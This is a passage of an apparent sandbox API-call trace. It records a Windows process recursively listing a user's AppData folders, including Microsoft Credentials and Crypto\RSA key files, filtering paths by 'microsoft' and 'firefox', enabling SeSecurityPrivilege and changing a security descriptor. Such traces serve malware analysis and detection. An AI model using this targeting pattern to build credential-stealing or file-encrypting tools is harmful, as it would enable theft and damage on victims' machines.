lpFindFileData=0x9ae018) returned 1 [0056.581] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0056.581] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 0 [0056.582] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="microsoft") returned 0x0 [0056.582] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", lpSrch="firefox") returned 0x0 [0056.582] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0056.582] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb070d8 [0056.582] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.582] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.582] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0056.582] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned 1 [0056.583] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="microsoft") returned 0x0 [0056.583] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", lpSrch="firefox") returned 0x0 [0056.583] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0056.583] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb071d8 [0056.583] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0056.583] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0056.583] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.584] Sleep (dwMilliseconds=0x0) [0056.586] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0056.586] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0056.586] Sleep (dwMilliseconds=0x0) [0056.609] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0056.609] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.610] Sleep (dwMilliseconds=0x0) [0056.626] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0 [0056.626] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0056.626] GetCurrentThread () returned 0xfffffffe [0056.626] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x9ae6c4 | out: TokenHandle=0x9ae6c4*=0x0) returned 0 [0056.626] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x9ae6c4 | out: TokenHandle=0x9ae6c4*=0x210) returned 1 [0056.626] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x9ae6cc | out: lpLuid=0x9ae6cc*(LowPart=0x8, HighPart=0)) returned 1 [0056.628] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0x9ae6c8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0056.628] GetLastError () returned 0x0 [0056.628] CloseHandle (hObject=0x210) returned 1 [0056.628] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0056.628] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb0c460, lpbSaclPresent=0x9ae6fc, pSacl=0x9ae6f0, lpbSaclDefaulted=0x9ae6f8 | out: lpbSaclPresent=0x9ae6fc, pSacl=0x9ae6f0, lpbSaclDefaulted=0x9ae6f8) returned 1 [0056.628] SetNamedSecurityInfoW () returned 0x0 [0056.636] LocalFree (hMem=0xb0c460) returned 0x0 [0056.636] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0056.637] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0xb07418 [0056.637] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0056.637] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0056.637] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0056.637] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0056.637] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07158 [0056.638] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.638] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.638] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0056.638] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0056.638] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07218 [0056.638] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.638] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.639] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0056.639] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0056.639] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0056.639] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.639] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.639] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0056.639] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.640] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.640] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0056.640] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.641] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0056.641] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0056.641] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*" [0056.641] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb070d8 [0056.641] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.641] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.642] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials" [0056.642] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0056.642] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0056.642] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.642] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.642] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0056.643] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.643] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto" [0056.643] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0056.643] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0056.643] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.643] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.644] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0056.644] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0056.644] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.645] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.645] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.645] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000" [0056.645] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0056.645] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07158 [0056.651] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.651] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.651] PathMatchSpecW (pszFile="1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0056.651] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.651] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_8c74eee4-8873-4eb3-9315-336075ff5033", pszSpec="*") returned 1 [0056.651] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.651] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.652] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.652] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.653] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0056.653] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0056.653] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0056.653] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0056.653] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0056.653] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0056.654] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.654] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0056.654] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0056.654] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0056.654] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0056.655] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.655] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.655] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.655] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.655] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0056.655] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.655] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0056.655] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.655] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0056.655] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0056.655] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07458 [0056.655] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.656] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.656] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0056.656] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0056.656] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0056.656] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.656] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.657] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.657] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0056.657] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0056.657] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0056.657] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07498 [0056.657] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.657] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.657] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0056.657] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0056.657] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0056.657] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0056.657] FindClose (in: hFindFile=0xb07498 | out: hFindFile=0xb07498) returned 1 [0056.658] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0056.658] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0056.658] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0056.658] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0056.658] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0056.658] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0056.659] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 